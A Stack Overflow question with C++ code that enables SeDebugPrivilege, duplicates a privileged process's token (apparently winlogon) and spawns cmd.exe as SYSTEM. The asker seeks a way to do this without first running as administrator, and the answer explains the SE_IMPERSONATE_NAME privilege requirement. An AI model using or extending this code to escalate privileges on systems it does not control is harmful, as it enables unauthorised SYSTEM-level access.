# Token impersonation on Windows requires administrator permission Why?

Tags: c++, windows, winapi, access-token

```
#include <windows.h>
#include <iostream>
#include <Lmcons.h>
#include <conio.h>

BOOL SetPrivilege(
HANDLE hToken,          // access 
token handle
LPCTSTR lpszPrivilege,  // name of 
privilege to enable/disable
BOOL bEnablePrivilege   // to 
enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;

if (!LookupPrivilegeValue(
    NULL,            // lookup 
privilege on local system
    lpszPrivilege,   // privilege 
to lookup 
    &luid))        // receives 
LUID of privilege
 {
    printf("[-] 
LookupPrivilegeValue error: %u\n", 
GetLastError());
    return FALSE;
 }

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
    tp.Privileges[0].Attributes = 
SE_PRIVILEGE_ENABLED;
else
    tp.Privileges[0].Attributes = 
0;

// Enable the privilege or disable 
all privileges.

  if (!AdjustTokenPrivileges(
    hToken,
    FALSE,
    &tp,
    sizeof(TOKEN_PRIVILEGES),
    (PTOKEN_PRIVILEGES)NULL,
    (PDWORD)NULL))
    {
    printf("[-] 
    AdjustTokenPrivileges error: 
    %u\n", 
    GetLastError());
    return FALSE;
    }

    if (GetLastError() == 
    ERROR_NOT_ALL_ASSIGNED)

    {
    printf("[-] The token does not 
    have the specified privilege. 
    \n");
    return FALSE;
     }

    return TRUE;
   }


 int main(int argc, char** argv) {
 // Print whoami to compare to 
  thread later
    printf("[+] Current user is: 
  %s\n"); // 
  (get_username()).c_str());
    system("whoami");
   // Grab PID from command line 
  argument
  char *pid_c = argv[1];
  DWORD PID_TO_IMPERSONATE = 900;

   // Initialize variables and 
   structures
   HANDLE tokenHandle = NULL;
   HANDLE duplicateTokenHandle = 
   NULL;
   STARTUPINFOW startupInfo;
   PROCESS_INFORMATION 
   processInformation;
   ZeroMemory(&startupInfo, 
   sizeof(STARTUPINFO));
   ZeroMemory(&processInformation, 
   sizeof(PROCESS_INFORMATION));
   startupInfo.cb = 
   sizeof(STARTUPINFO);

   // Add SE debug privilege
   HANDLE currentTokenHandle = 
   NULL;
   BOOL getCurrentToken = 
   OpenProcessToken 
   (GetCurrentProcess(), 
   TOKEN_ADJUST_PRIVILEGES, 
   &currentTokenHandle);
   if 
   (SetPrivilege 
   (currentTokenHandle, 
   "SeDebugPrivilege", TRUE))
    {
    printf("[+] SeDebugPrivilege 
    enabled!\n");
     }

    // Call OpenProcess(), print 
    return code and error code
    HANDLE processHandle = 
    OpenProcess 
    (PROCESS_QUERY_INFORMATION, 
     true, PID_TO_IMPERSONATE);
    if (GetLastError() == NULL)
    printf("[+] OpenProcess() 
    success!\n");
     else
     {
    printf("[-] OpenProcess() 
     Return Code: %i\n", 
     processHandle);
        printf("[-] OpenProcess() 
     Error: %i\n", 
     GetLastError());
     }

     // Call OpenProcessToken(), 
     print return code and error 
     code
     BOOL getToken = 
     OpenProcessToken 
      (processHandle, 
      TOKEN_DUPLICATE | 
      TOKEN_ASSIGN_PRIMARY | 
      TOKEN_QUERY, &tokenHandle);
      if (GetLastError() == NULL)
        printf("[+] 
      OpenProcessToken() 
       success!\n");
        else
       {
     printf("[-] 
     OpenProcessToken() Return 
     Code: %i\n", getToken);
    printf("[-] OpenProcessToken() 
     Error: %i\n", 
     GetLastError());
      }

       // Impersonate user in a 
      thread
     BOOL impersonateUser = 
     ImpersonateLoggedOnUser
     (tokenHandle);
    if (GetLastError() == NULL)
    {
    printf("[+] 
    ImpersonatedLoggedOnUser() 
      success!\n");
      //    printf("[+] Current 
      user is: %s\n", 
     (get_username()).c_str());
    system("whoami");
    printf("[+] Reverting thread 
    to original user context\n");
    RevertToSelf();
    }
    else
    {
    printf("[-] 
    ImpersonatedLoggedOnUser() 
    Return Code: %i\n", getToken);
    printf("[-] 
    ImpersonatedLoggedOnUser() 
    Error: %i\n", GetLastError());
    }   

    // Call DuplicateTokenEx(), 
     print return code and error 
     code
    BOOL duplicateToken = 
    DuplicateTokenEx(tokenHandle, 
    TOKEN_ADJUST_DEFAULT | 
    TOKEN_ADJUST_SESSIONID | 
    TOKEN_QUERY | TOKEN_DUPLICATE 
   | TOKEN_ASSIGN_PRIMARY, NULL, 
    SecurityImpersonation, 
    TokenPrimary, 
    &duplicateTokenHandle);
    if (GetLastError() == NULL)
    printf("[+] DuplicateTokenEx() 
    success!\n");
    else
    {
    printf("[-] DuplicateTokenEx() 
    Return Code: %i\n", 
    duplicateToken);
    printf("[-] DupicateTokenEx() 
    Error: %i\n", GetLastError());
    }

    // Call 
    CreateProcessWithTokenW(), 
     print return code and error 
     code
     BOOL createProcess =  
     CreateProcessWithTokenW 
     (duplicateTokenHandle, 
      LOGON_WITH_PROFILE, 
     L"C:\\Windows\  
      \System32\\cmd.exe", NULL, 
     0, NULL, NULL, &startupInfo, 
     &processInformation);
     if (GetLastError() == NULL)
     printf("[+] Process 
     spawned!\n");
     else
      {
        printf("[-] 
     CreateProcessWithTokenW  
     Return Code: %i\n", 
     createProcess);
    printf("[-] 
    CreateProcessWithTokenW Error: 
    %i\n", GetLastError());
    }

    getch();
    return 0;
    }
```

This is a code that impersonates Winlogon Access token on Windows to give me System rights but it requires me to run the program as administrator before I'm able to impersonate Winlogon...

I believe the reason is based on lack of privileges my program access token has.
If there's anyone that can give me an idea to do this without running as administrator first I'll appreciate.

Comment: if any code can take and impersonate system token - what sense in tokens at all ?

Comment: Winlogon is a privileged program, so, to impersonate it, you must be too.  Stands to reason, no?

Comment: I'm able to impersonate the token if you should change CreateProcesswithToken to CreateprocessAsUserA you'll get Normal administrator privileges without having to run as administrator... I'll be able to do almost everything but I need nt-authority\SYSTEM..

Comment: And with CreateProcesswithToken I'm also able to get nt-authority\SYSTEM but I'll have to run my program as administrator.

Comment: Most RDP uses some of this impersonation functions on Windows that's the reason they where created I think... But it's been manipulated and used wrongly during privileged escalation.

Comment: I'll appreciate if you could run the code you'll understand more about the issue....

Comment: I've set my personal program access token to Sedebugprivelege privileged that helps with the impersonation.

Comment: If you wish that others run your code, it would be wise to provide code that can actually be compiled. As it stands, the code is so poorly formatted, that it's hardly even possible to read.

Comment: It's just the way I posted it here that has made it difficult I think.

Comment: No, the issue is with *your* source code. It uses a wild mixture of tab and space indentation already, in addition to inconsistent end-of-line markers. You'll want to get into the habit of choosing *one* option, and stick with it. Regardless, it is never too late to [fix](https://stackoverflow.com/posts/74077979/edit) the formatting.

Comment: @lInspectable welcome format of source code in an environment without compliance\standard checking. What you see here is pretty normal in hndreds of small or apathetic environments. The is never singe setting, single IDE and even single platfrom in use.

Comment: @Swift-FridayPie That's no excuse to post code as messy as this, especially if you're asking people to debug it for you.  There are plenty of pretty printers out there, it doesn't take much effort to rectify this. Furthermore, as posted, the code is totally broken, because of the extra line breaks.

Comment: @PaulSanders I agree that it's no excuse. Just some _companies_  not-teach their employers this way, extra line breaks might be result of an atomated formatting plugin they use with SAP or something similar. User might be ignorant why tect changes itself on copy-paste :P

Answer (score 2):

What it actually requires is that the account holds the SE_IMPERSONATE_NAME privilege and the particular process having it enabled. Normally only highly trusted accounts (an elevated Administrator token or Local System used by default for services) have this privilege but you can assign it to others through the "Local Users and Groups" (or "Active Directory Users and Computers" if using AD) MMC snap-in.